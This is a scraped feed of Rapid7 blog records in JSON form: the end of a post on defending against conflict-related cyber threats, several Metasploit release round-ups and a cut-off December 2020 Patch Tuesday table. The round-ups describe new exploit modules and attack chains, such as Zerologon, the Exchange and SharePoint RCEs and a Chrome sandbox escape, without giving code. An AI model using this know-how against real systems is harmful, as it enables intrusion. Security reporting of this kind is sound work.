attachment scanning is in place. Educating end users of the dangers of phishing and regularly running phishing campaigns will also help mitigate this issue.\n\nState-sponsored, APT-style groups are not the only relevant threats. In times of crisis, it is common to see phishing attacks linking to malicious websites masquerading as news, aid groups, or other seemingly relevant content. Opportunistic scammers and other bad actors will attempt to take advantage of our human nature when curiosity, anxiety, and desire to help can make people less suspicious. Remain vigilant and avoid clicking unknown links or opening attachments \u2014 basic cyber hygiene that can be forgotten when emotions run high. \n\n\n## Brute-force attacks\n\n[According to a report from the NSA, CISA, FBI, and NCSC](<https://media.defense.gov/2021/Jul/01/2002753896/-1/-1/1/CSA_GRU_GLOBAL_BRUTE_FORCE_CAMPAIGN_UOO158036-21.PDF>), \u201cFrom mid-2019 through early 2021, Russian General Staff Main Intelligence Directorate (GRU) \u2026 conduct[ed] widespread, distributed, and anonymized brute-force access attempts against hundreds of government and private sector targets worldwide.\u201d GRU used the discovered credentials to gain access into networks and further used known vulnerabilities such as CVE-2020-0688 and CVE-2020-17144 to increase access.\n\nThe best mitigation for these types of attacks is to enable MFA on all systems. Minimize externally facing systems and ensure externally facing systems are fully patched. \n\n\n## Defacement\n\nUkraine has also been experiencing website defacements, which provide attackers with an opportunity to spread messaging. Website defacement is typically associated with hacktivist activity, but state-sponsored Russian actors could pose as hacktivists in order to disguise Russian state involvement, and spread their strategic communication themes to international audiences by defacing Western websites. \n\nWebsite defacement often occurs as a result of weak passwords for admin accounts, cross-site scripting, injection, file upload, or vulnerable plugins. This can be managed by limiting the level of access accounts have and enforcing strong passwords. Additionally, looking for places where scripts or iframes could be injected or where SQL injection could occur can help identify vulnerabilities to remediate. \n\n\n## Ransomware\n\nRansomware could also be used to disrupt foreign targets. Criminals based in Russia were [believed](<https://thehill.com/homenews/administration/589850-biden-administration-says-russia-arrested-colonial-pipeline-hacker>) to be behind the 2021 ransomware attack on Colonial Pipeline in the United States. Ransomware can have disruptive effects on targets, and the attackers could simply refrain from decrypting files, even if they receive ransom payments, in order to maximize and extend the disruptive impact on victims. Additionally, opportunistic attackers who are actually looking for ransoms will still be on the prowl, and are likely to take advantage of the chaos. \n\nTo this end, defenders should:\n\n * Evaluate asset and application configurations to ensure resilience\n * Double-check visibility into the functioning of business-critical assets\n * Assess incident response processes in the case of an incident \n\n\n## What else should you be doing?\n\nThe following activities are mission-critical in times of uncertainty, but they are also best practices in general.\n\n * **Continuous monitoring: **Reinforce cybersecurity measures and staff during nights, weekends, and holidays. Threat actors are known to target their victims when there are gaps in \u201ceyes on glass.\u201d\n * **Incident response plan:** Prepare a dedicated team with a detailed workflow and a contact person that will be available offline in case of a cybersecurity incident.\n * **Back up data:** Implement data backup procedures of the company networks and systems. Backup procedures should be conducted on a frequent, regular basis for immediate recovery. Also, be sure to store backups offline and check them regularly to ensure they have not been poisoned with malware.\n * **Reduce opportunities for attackers: **Identify exposures, vulnerabilities, and misconfigurations that can provide opportunities for attackers to gain a foothold in your environment, and apply relevant mitigations or patches. In particular, Russian operators are well known to exploit edge systems. The Cybersecurity and Infrastructure Security Agency (CISA) [recently put out an alert](<https://www.cisa.gov/uscert/ncas/alerts/aa22-011a>) listing 13 known vulnerabilities that Russian state-sponsored threat actors use to initially compromise networks. We recommend this as a starting point for focused patching and mitigation.\n * **Stay informed:** Follow the latest updates and recommendations provided by Rapid7, as well as governmental security entities in specific press releases/alerts from the [Ukraine CERT](<https://cert.gov.ua/>), [The Security Service of Ukraine (SSU)](<https://ssu.gov.ua/en>), and the [US CISA](<https://www.cisa.gov/uscert>).\n\nWe expect the situation to be fluid over the coming days and weeks, and security guidance and threats may also evolve as the conflict develops. The measures suggested in this blog will continue to be relevant, and we plan to provide additional information as needed. \n\nIn the meantime, you can also [check this blog](<https://www.rapid7.com/blog/post/2022/02/25/russia-ukraine-conflict-what-is-rapid7-doing-to-protect-my-organization/>) to see how Rapid7 can help you prepare for and respond to cyber attacks. We also recommend organizations check their government\u2019s cybersecurity website for guidance.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-02-25T01:31:27", "type": "rapid7blog", "title": "Staying Secure in a Global Cyber Conflict", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0688", "CVE-2020-17144"], "modified": "2022-02-25T01:31:27", "id": "RAPID7BLOG:CBD7A5DA1DAAE9DCFD01F104F4B1B5FB", "href": "https://blog.rapid7.com/2022/02/25/russia-ukraine-staying-secure-in-a-global-cyber-conflict/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2020-10-09T20:40:17", "description": "## SAP Internet Graphics Server (IGS)\n\n![Metasploit Wrap-Up](https://blog.rapid7.com/content/images/2020/10/metasploit-blg-2-small-1.png)\n\nThis week includes a new module targeting the SAP Internet Graphics Server application, contributed by community member [Vladimir Ivanov](<https://github.com/Vladimir-Ivanov-Git>). This particular module covers two CVEs that are both XML External Entity (XXE) bugs that are remotely exploitable. The module comes fully featured with the ability to check for the presence of the vulnerabilities as well as two methods to leverage them. The first is a read action that allows users to read files from the remote server, while the second can be used to trigger a denial of service (DoS) condition.\n\n## Just read the (new Zerologon) docs\n\nThe module documentation for the Zerologon ([CVE-2020-1472](<https://attackerkb.com/topics/7FbcgDOidQ/cve-2020-1472-aka-zerologon?referrer=wrapup>)) module has been updated with details of how to run the entire attack workflow through Metasploit. This specifically included leveraging the new `auxiliary/gather/windows_secrets_dump` which can recover the machine password to restore on the targeted Domain Controller and using the PSexec module to execute a payload. It\u2019s important to restore the machine account password to prevent services from breaking. Module documentation can be accessed from msfconsole by using the `info -d` command. The most recent Metasploit Demo meeting also covered this content, [showing](<https://www.youtube.com/watch?v=Z5oQmHVsqjA&t=1648>) the newly documented workflow in action.\n\n## New modules (1)\n\n * [SAP Internet Graphics Server (IGS) XMLCHART XXE](<https://github.com/rapid7/metasploit-framework/pull/14163>) by Vladimir Ivanov and Yvan Genuer, which exploits [CVE-2018-2393](<https://attackerkb.com/topics/EmAs1SnpOK/cve-2018-2393?referrer=wrapup>)\n\n## Enhancements and features\n\n * [Update sap_service_discovery.rb to support discovering SAP IGS servers](<https://github.com/rapid7/metasploit-framework/pull/14238>) by Vladimir Ivanov\n * [Tab-completion improved for module OPTIONS not available](<https://github.com/rapid7/metasploit-framework/pull/14070>) by mariabelenTC\n * [Add disclosure date rubocop linting rule - enforce iso8601 disclosure dates](<https://github.com/rapid7/metasploit-framework/pull/14213>) by Alan David Foster\n * [Add the DOMAIN option to the CVE-2020-0688 Exploit](<https://github.com/rapid7/metasploit-framework/pull/14190>) by Spencer McIntyre\n * [Update the module docs for CVE-2020-1472 (Zerologon)](<https://github.com/rapid7/metasploit-framework/pull/14204>) by Spencer McIntyre\n\n## Bugs fixed\n\n * [Fix msf6 TLV_TYPE_PIVOT_STAGE_DATA_SIZE pivoting error](<https://github.com/rapid7/metasploit-framework/pull/14028>) by Alan David Foster\n * [Always show module actions within the info command](<https://github.com/rapid7/metasploit-framework/pull/14233>) by Alan David Foster\n * [Remove modules whose deprecation date has passed](<https://github.com/rapid7/metasploit-framework/pull/14242>) by Spencer McIntyre\n * [Convert myworkspace.id to myworkspace_id for no db compat](<https://github.com/rapid7/metasploit-framework/pull/14226>) by h00die\n * [Disconnect the named pipe and break after the impersonation callback](<https://github.com/rapid7/metasploit-payloads/pull/438>) by Spencer McIntyre\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` \nand you can get more details on the changes since the last blog post from \nGitHub:\n\n * [Pull Requests 6.0.9...6.0.10](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222020-10-01T17%3A52%3A23%2B01%3A00..2020-10-08T11%3A41%3A44-05%3A00%22>)\n * [Full diff 6.0.9...6.0.10](<https://github.com/rapid7/metasploit-framework/compare/6.0.9...6.0.10>)\n\nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest. \nTo install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the \n[binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).", "cvss3": {}, "published": "2020-10-09T19:41:47", "type": "rapid7blog", "title": "Metasploit Wrap-Up", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-2393", "CVE-2020-0688", "CVE-2020-1472"], "modified": "2020-10-09T19:41:47", "id": "RAPID7BLOG:0C3EDBDC537092A20C850F762D5A5856", "href": "https://blog.rapid7.com/2020/10/09/metasploit-wrap-up-82/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-09-29T08:39:07", "description": "## Refreshingly configurable\n\n![Metasploit Wrap-Up](https://blog.rapid7.com/content/images/2020/09/metasploit-ascii-1.png)\n\nF5, on top of being a handy shortcut you can press over and over again until 3am just to watch the RTX 3080 preorders sell out instantly, is also a company that specializes in the delivery, security, performance, and availability of web applications, computing, storage, and network resources.\n\nCommunity contributor [h00die](<https://github.com/h00die>) added support to msfconsole that allows the processing of F5 device config processing library, as well as a post module that can gather information on F5 devices, and an auxiliary module capable of processing F5 config files offline.\n\n## The Mida(s) Touch, but for vulns\n\nA new exploit added by [bcoles](<https://github.com/bcoles>) takes advantage of an OS command injection vulnerability in the Mida Solutions eFramework developed (shockingly) by Mida Solutions, a Unified Communication compant.\n\nShell commands can be executed as the `apache` user without authentication via the `PARAM` parameter in requests made to `ajaxreq.php`. The `sudo` configuration also allows the `apache` user to execute commands without requiring a password, making code execution as the `root` user possible.\n\n## The V stands for Vuln\n\nOur very own [Grant Wilcox](<https://github.com/gwillcox-r7>) put together a neat post module for Windows machines running Hyper-V that allows the enumeration of any Hyper-V Virtual Machines installed on said machine.\n\nThe findings of this module (status, CPU usage, Hyper-V engine version, and state) are then entered into the metasploit `loot`, for easy export and retrieval.\n\n## Multiple logins with Zerologon\n\nLast but certainly not least, the gnarly ["Zerologon"](<https://www.secura.com/pathtoimg.php?id=2055>) ([CVE-2020-1472](<https://attackerkb.com/topics/7FbcgDOidQ/cve-2020-1472-aka-zerologon?referrer=blog>)) privilege escalation vulnerability already has a [PR in the works](<https://github.com/rapid7/metasploit-framework/pull/14151>) courtesy of the always wonderful [zeroSteiner](<https://github.com/zeroSteiner>).\n\nFor more information on the vulnerability that everyone's talking about, see our [analysis on AttackerKB](<https://attackerkb.com/topics/7FbcgDOidQ/cve-2020-1472-aka-zerologon?referrer=blog#rapid7-analysis>).\n\n## New modules (6)\n\n * [Mida Solutions eFramework ajaxreq.php Command Injection](<https://github.com/rapid7/metasploit-framework/pull/14074>) by bcoles and elbae, which exploits [CVE-2020-15920](<https://attackerkb.com/topics/Hnbafc8Cw2/cve-2020-15920?referrer=search>)\n * [Microsoft Exchange Server DlpUtils AddTenantDlpPolicy RCE](<https://github.com/rapid7/metasploit-framework/pull/14126>) by wvu and mr_me, which exploits [CVE-2020-16875](<https://attackerkb.com/topics/Y2azzfAbid/cve-2020-16875?referrer=blog>)\n * [F5 Configuration Importer](<https://github.com/rapid7/metasploit-framework/pull/14031>) by h00die\n * [F5 Device General Information Gatherer](<https://github.com/rapid7/metasploit-framework/pull/14031>) by h00die\n * [Bypass the macOS TCC Framework](<https://github.com/rapid7/metasploit-framework/pull/13942>) by mattshockl and timwr, which exploits [CVE-2020-9934](<https://attackerkb.com/topics/vwxuFjGw0v/cve-2020-9934---macos-transparency-consent-and-control-tcc-framework-bypass?referrer=blog>)\n * [Windows Hyper-V VM Enumeration](<https://github.com/rapid7/metasploit-framework/pull/14117>) by gwillcox-r7\n\n## Enhancements and features\n\n * PR [#14139](<https://github.com/rapid7/metasploit-framework/pull/14139>) \\- This updates the HTTP client library that is used by many Metasploit modules to be more compliant across standards in regards to redirection handling while also adding a new feature to more easily manage cookies.\n\n * PR [#14126](<https://github.com/rapid7/metasploit-framework/pull/14126>) \\- This adds an authenticated RCE exploit for Microsoft Exchange which leverages the flaw identified as [CVE-2020-16875](<https://attackerkb.com/topics/Y2azzfAbid/cve-2020-16875?referrer=blog>) to inject code when processing a new DLP policy. The user must have the "Data Loss Prevention" role assigned in order to exploit this vulnerability.\n\n * PR [#14125](<https://github.com/rapid7/metasploit-framework/pull/14125>) \\- Adds SCREEN_EFFECTS and ARTIFACTS_ON_DISK notes to the `post/osx/escalate/tccbypass` module.\n\n * PR [#14117](<https://github.com/rapid7/metasploit-framework/pull/14117>) \\- This adds a post module that checks if a target is a Hyper-V host and attempt to gather information about all Hyper-V VMs.\n\n * PR [#14074](<https://github.com/rapid7/metasploit-framework/pull/14074>) \\- This adds an exploit for Mida Solutions eFramework versions `2.9.0` and below. Shell commands can be executed as the `apache` user via the `PARAM` parameter in requests to `ajaxreq.php` without authentication. Because the `sudo` configuration allows the `apache` user to execute commands without requiring a password, this vector ultimately achieves code execution as the `root` user.\n\n * PR [#13942](<https://github.com/rapid7/metasploit-framework/pull/13942>) \\- This PR adds a module to leverage CVE-2020-9934 to allow a session to bypass the macOS Transparency, Consent, and Control (TCC) Framework for unauthorized access to sensitive user data.\n\n * PR [#13571](<https://github.com/rapid7/metasploit-framework/pull/13571>) \\- This updates the Session Notifier plugin to support sending notifications using DingTalk webhooks.\n\n * PR [#14111](<https://github.com/rapid7/metasploit-framework/pull/14111>) \\- Removes dead code that previously tracked payload sizes when Metasploit was booting up.\n\n## Bugs fixed\n\n * PR [#14145](<https://github.com/rapid7/metasploit-framework/pull/14145>) \\- A bug within the implementation of the `report_loot` method has been fixed to ensure that data is always base64 encoded prior to sending it to the web service, which always expects base64 encoded data. Application of this fix ensures that `report_loot` will not send any unencoded data which could cause an exception.\n\n * PR [#14143](<https://github.com/rapid7/metasploit-framework/pull/14143>) \\- This update replaces all calls to the depreciated `get_service` function with calls to the more modern function known as `services`. This solves some known issues related to existing `get_service` calls that affected modules `badblue_passthru` and `tomcat_mgr_upload` when connected to a remote database.\n\n * PR [#14120](<https://github.com/rapid7/metasploit-framework/pull/14120>) \\- Fixes bug that caused `services -S` to return results from all workspaces, instead of the current workspace.\n\n * PR [#14138](<https://github.com/rapid7/metasploit-framework/pull/14138>) \\- Fixes `nexus_repo_manager_el_injection.md`.\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` \nand you can get more details on the changes since the last blog post from \nGitHub:\n\n * [Pull Requests 6.0.6...6.0.7](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222020-09-10T13%3A10%3A53-05%3A00..2020-09-17T11%3A03%3A21-05%3A00%22>)\n * [Full diff 6.0.6...6.0.7](<https://github.com/rapid7/metasploit-framework/compare/6.0.6...6.0.7>)\n\nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest. \nTo install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the \n[binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).", "cvss3": {}, "published": "2020-09-18T18:28:37", "type": "rapid7blog", "title": "Metasploit Wrap-Up", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-1472", "CVE-2020-15920", "CVE-2020-16875", "CVE-2020-9934"], "modified": "2020-09-18T18:28:37", "id": "RAPID7BLOG:5586742AC0F1C66F56B3583482B0960A", "href": "https://blog.rapid7.com/2020/09/18/untitled-6/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-28T04:47:53", "description": "![Metasploit Wrap-Up](https://blog.rapid7.com/content/images/2020/10/metasploit-blg-3-copy.png)\n\nMetasploit keeping that developer awareness rate up.\n\n![Metasploit Wrap-Up](https://blog.rapid7.com/content/images/2020/10/telerik-fake-text-2.png)\n\nThanks to [mr_me](<https://github.com/stevenseeley>) & [wvu](<https://github.com/wvu-r7>), SharePoint is an even better target to find in your next penetration test. The newly minted module can net you a shell and a copy of the servers config, making that report oh so much more fun.\n\nLike to escape the sandbox? WizardOpium has your first taste of freedom. Brought to you by [timwr](<https://github.com/timwr>) and friends through Chrome, [this module](<https://github.com/rapid7/metasploit-framework/blob/4fb0c4ac8ab89575c4358d2369d3650bc3e1c10d/modules/exploits/multi/browser/chrome_object_create.rb>) might be that push you need to get out onti solid ground.\n\n## New modules (4)\n\n * [Login to Another User with Su on Linux / Unix Systems](<https://github.com/rapid7/metasploit-framework/pull/14179>) by [Gavin Youker](<https://github.com/youkergav>)\n * [Microsoft SharePoint Server-Side Include and ViewState RCE](<https://github.com/rapid7/metasploit-framework/pull/14265>) by [wvu](<https://github.com/wvu-r7>) and [mr_me](<https://github.com/stevenseeley>), which exploits [CVE-2020-16952](<https://attackerkb.com/topics/4yGC4tLK2x/cve-2020-16952-microsoft-sharepoint-remote-code-execution-vulnerabilities?referrer=wrapup>)\n * [Telerik UI ASP.NET AJAX RadAsyncUpload Deserialization](<https://github.com/rapid7/metasploit-framework/pull/14229>) by [Alvaro Mu\u00f1oz](<https://github.com/pwntester>), [Caleb Gross](<https://github.com/noperator>), [Markus Wulftange](<https://github.com/mwulftange>), [Oleksandr Mirosh](<https://twitter.com/olekmirosh>), [Paul Taylor](<https://github.com/bao7uo>), [Spencer McIntyre](<https://github.com/zeroSteiner>), and [straightblast](<https://github.com/straightblast>), which exploits [CVE-2019-18935](<https://attackerkb.com/topics/ZA24eUeDg5/cve-2019-18935?referrer=wrapup>)\n * [Microsoft Windows Uninitialized Variable Local Privilege Elevation](<https://github.com/rapid7/metasploit-framework/pull/13817>) by [piotrflorczyk](<https://github.com/piotrflorczyk>), [timwr](<https://github.com/timwr>), and [unamer](<https://github.com/unamer>), which exploits [CVE-2019-1458](<https://attackerkb.com/topics/2i67dR7P4e/cve-2019-1458?referrer=wrapup>)\n\n## Enhancements and features\n\n * [Add version check to exchange_ecp_dlp_policy](<https://github.com/rapid7/metasploit-framework/pull/14289>) by [wvu](<https://github.com/wvu-r7>) adds extended version checks for SharePoint and Exchange servers as used by the exploit modules for [CVE-2020-16875](<https://attackerkb.com/topics/Y2azzfAbid/cve-2020-16875?referrer=wrapup>) and [CVE-2020-16952](<https://attackerkb.com/topics/4yGC4tLK2x/cve-2020-16952-microsoft-sharepoint-remote-code-execution-vulnerabilities?referrer=wrapup>).\n * [Parameterize args to popen3()](<https://github.com/rapid7/metasploit-framework/pull/14288>) by [Justin Steven](<https://github.com/justinsteven>) improves commands executed during `apk` generation commands to be more explicit with options.\n * [More improved doc and syntax](<https://github.com/rapid7/metasploit-framework/pull/14258>) by [h00die](<https://github.com/h00die>) adds documentation and code quality changes for multiple modules. As always docs improvement are greatly appreciated!\n * [Add tab completion for `run` command](<https://github.com/rapid7/metasploit-framework/pull/14240>) by [cgranleese-r7](<https://github.com/cgranleese-r7>) adds tab completion for specifying inline options when using the `run` command. For example, within Metasploit's console typing `run` and then hitting the tab key twice will now show all available option names. Incomplete option names and values can also be also suggested, for example `run LHOST=` and then hitting the tab key twice will show all available LHOST values.\n * [CVE-2019-1458 chrome sandbox escape](<https://github.com/rapid7/metasploit-framework/pull/13817>) by [timwr](<https://github.com/timwr>) adds support for exploiting [CVE-2019-1458](<https://attackerkb.com/topics/2i67dR7P4e/cve-2019-1458?referrer=wrapup>), aka WizardOpium, as both a standalone LPE module, and as a sandbox escape option for the `exploit/multi/browser/chrome_object_create.rb` module that exploits [CVE-2018-17463](<https://attackerkb.com/topics/fgJVNLkV6f/cve-2018-17463?referrer=wrapup>) in Chrome, thereby allowing users to both elevate their privileges on affected versions of Windows, as well as potentially execute a full end to end attack chain to go from a malicious web page to SYSTEM on systems running vulnerable versions of Chrome and Windows.\n * [Parameterize args to popen3()](<https://github.com/rapid7/metasploit-framework/pull/14288>) by [Justin Steven](<https://github.com/justinsteven>) improves commands executed during `apk` generation commands to be more explicit with options.\n * [More improved doc and syntax](<https://github.com/rapid7/metasploit-framework/pull/14258>) by [h00die](<https://github.com/h00die>) adds documentation and code quality changes for multiple modules. As always, docs improvements are greatly appreciated!\n\n## Bugs fixed\n\n * [MS17-010 improvements for SMB1 clients](<https://github.com/rapid7/metasploit-framework/pull/14290>) by [Spencer McIntyre](<https://github.com/zeroSteiner>) fixes an issue with the exploit/windows/smb/ms17_010_eternalblue module that was preventing sessions from being obtained successfully.\n * [Fix missing TLV migration from strings -> ints](<https://github.com/rapid7/metasploit-payloads/pull/441>) by [Justin Steven](<https://github.com/justinsteven>) converts a missed TLV conversion for COMMAND_ID_CORE_CHANNEL_CLOSE for PHP payloads.\n * [Meterpreter endless loop](<https://github.com/rapid7/metasploit-payloads/pull/439>) by [vixfwis](<https://github.com/vixfwis>), ensured that Meterpreter can properly handle SOCKET_ERROR on recv.\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` and you can get more details on the changes since the last blog post from GitHub:\n\n * [Pull Requests 6.0.11...6.0.12](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222020-10-13T14%3A57%3A09-05%3A00..2020-10-22T09%3A00%3A02-05%3A00%22>)\n * [Full diff 6.0.11...6.0.12](<https://github.com/rapid7/metasploit-framework/compare/6.0.11...6.0.12>)\n\nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest. To install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the [binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).", "cvss3": {}, "published": "2020-10-23T18:56:55", "type": "rapid7blog", "title": "Metasploit Wrap-Up", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-17463", "CVE-2019-1458", "CVE-2019-18935", "CVE-2020-16875", "CVE-2020-16952"], "modified": "2020-10-23T18:56:55", "id": "RAPID7BLOG:E8EB68630D38C60B7DE4AF696474210D", "href": "https://blog.rapid7.com/2020/10/23/metasploit-wrap-up-84/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2020-12-12T10:47:13", "description": "![Patch Tuesday - December 2020](https://blog.rapid7.com/content/images/2020/12/patches-2.jpg)\n\nWe close off our 2020 year of Patch Tuesdays with 58 vulnerabilities being addressed. While it's a higher count than our typical December months (high thirties), it's still a nice breath of fresh air given how the past year has been. We do, however, get to celebrate that none of the reported vulnerabilities covered this month has been publicly exploited nor previously publicly disclosed and only 9 of the 58 vulnerabilities have been marked as Critical by Microsoft.\n\nIn terms of actionables, standard procedures can be followed here in terms of how to prioritize which sets of patches to apply first with two exceptions.\n\n## Microsoft Office vulnerabilities\n\nA fair amount of remote code executions targeting Microsoft Excel are being patched up today and while none of them have the Preview Pane set as an attack vector, the volume of remote code execution vulnerabilities pertaining to Microsoft Office this month may suggest a slight re-jig of priorities. That's our first (minor) exception.\n\nThe next exception is likely the most notable piece behind this December 2020 Patch Tuesday: Microsoft Exchange Server.\n\n## Microsoft Exchange Server vulnerabilities\n\nWhile there are a total of six vulnerabilities from Microsoft Exchange Server this month, two of them garner a CVSS score of 9.1 ([CVE-2020-17132](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-17132>), [CVE-2020-17142](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-17142>)) and one is noted by Microsoft has having a higher chance of exploitability ([CVE-2020-17144](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-17144>)). These three warrant an additional examination and may be grounds for prioritizing patching.\n\nThere is currently suspicion that [CVE-2020-17132](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-17132>) helps address the patch bypass of [CVE-2020-16875](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-16875>) (CVSS 8.4) from September 2020. As well, both [CVE-2020-17132](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-17132>) and [CVE-2020-17142](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-17142>) are remote code execution vulnerabilities occurring due to improper validation of cmdlet arguments that affect all supported (as of writing) versions of Microsoft Exchange. One important note to consider is while these vulnerabilities have received a CVSS score of 9.1 and do not require additional user interaction, an attacker must be in an authenticated role in order to exploit this vulnerability.\n\nIn contrast, [CVE-2020-17144](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-17144>) which is another remote code execution vulnerability also stemming from improper validation for cmdlet arguments, this one only affects Exchange Server 2010 SP3 and does require additional user interaction to successfully execute. This is extra interesting as [Microsoft Exchange Server 2010 passed end of life back on October 22, 2020](<https://techcommunity.microsoft.com/t5/exchange-team-blog/microsoft-extending-end-of-support-for-exchange-server-2010-to/ba-p/753591>). The introduction of this post-EOL patch for Microsoft Exchange Server 2010 coupled with Microsoft noting this vulnerability to be more likely exploitable does suggest prioritizing this patch a bit earlier.\n\n## New Summary Tables\n\nIn an attempt to provide a bit more summarizing tables, here are this month's patched vulnerabilities split by the product family.\n\n### Azure Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Disclosed | CVSS3 | has_faq \n---|---|---|---|---|--- \n[CVE-2020-17160](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17160>) | Azure Sphere Security Feature Bypass Vulnerability | False | False | 7.4 | True \n[CVE-2020-16971](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16971>) | Azure SDK for Java Security Feature Bypass Vulnerability | False | False | 7.4 | False \n \n### Browser Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Disclosed | CVSS3 | has_faq \n---|---|---|---|---|--- \n[CVE-2020-17153](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17153>) | Microsoft Edge for Android Spoofing Vulnerability | False | False | 4.3 | True \n[CVE-2020-17131](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17131>) | Chakra Scripting Engine Memory Corruption Vulnerability | False | False | 4.2 | False \n \n### Developer Tools Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Disclosed | CVSS3 | has_faq \n---|---|---|---|---|--- \n[CVE-2020-17148](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17148>) | Visual Studio Code Remote Development Extension Remote Code Execution Vulnerability | False | False | 7.8 | True \n[CVE-2020-17150](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17150>) | Visual Studio Code Remote Code Execution Vulnerability | False | False | 7.8 | False \n[CVE-2020-17156](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17156>) | Visual Studio Remote Code Execution Vulnerability | False | False | 7.8 | True \n[CVE-2020-17159](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17159>) | Visual Studio Code Java Extension Pack Remote Code Execution Vulnerability | False | False | 7.8 | False \n[CVE-2020-17002](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17002>) | Azure SDK for C Security Feature Bypass Vulnerability | False | False | 7.4 | False \n[CVE-2020-17135](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17135>) | Azure DevOps Server Spoofing Vulnerability | False | False | 6.4 | False \n[CVE-2020-17145](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17145>) | Azure DevOps Server and Team Foundation Services Spoofing Vulnerability | False | False | 5.4 | False \n \n### ESU Windows Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Disclosed | CVSS3 | has_faq \n---|---|---|---|---|--- \n[CVE-2020-17140](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17140>) | Windows SMB Information Disclosure Vulnerability | False | False | 8.1 | True \n[CVE-2020-16958](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16958>) | Windows Backup Engine Elevation of Privilege Vulnerability | False | False | 7.8 | False \n[CVE-2020-16959](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16959>) | Windows Backup Engine Elevation of Privilege Vulnerability | False | False | 7.8 | False \n[CVE-2020-16960](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16960>) | Windows Backup Engine Elevation of Privilege Vulnerability | False | False | 7.8 | False \n[CVE-2020-16961](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16961>) | Windows Backup Engine Elevation of Privilege Vulnerability | False | False | 7.8 | False \n[CVE-2020-16962](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16962>) | Windows Backup Engine Elevation of Privilege Vulnerability | False | False | 7.8 | False \n[CVE-2020-16963](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16963>) | Windows Backup Engine Elevation of 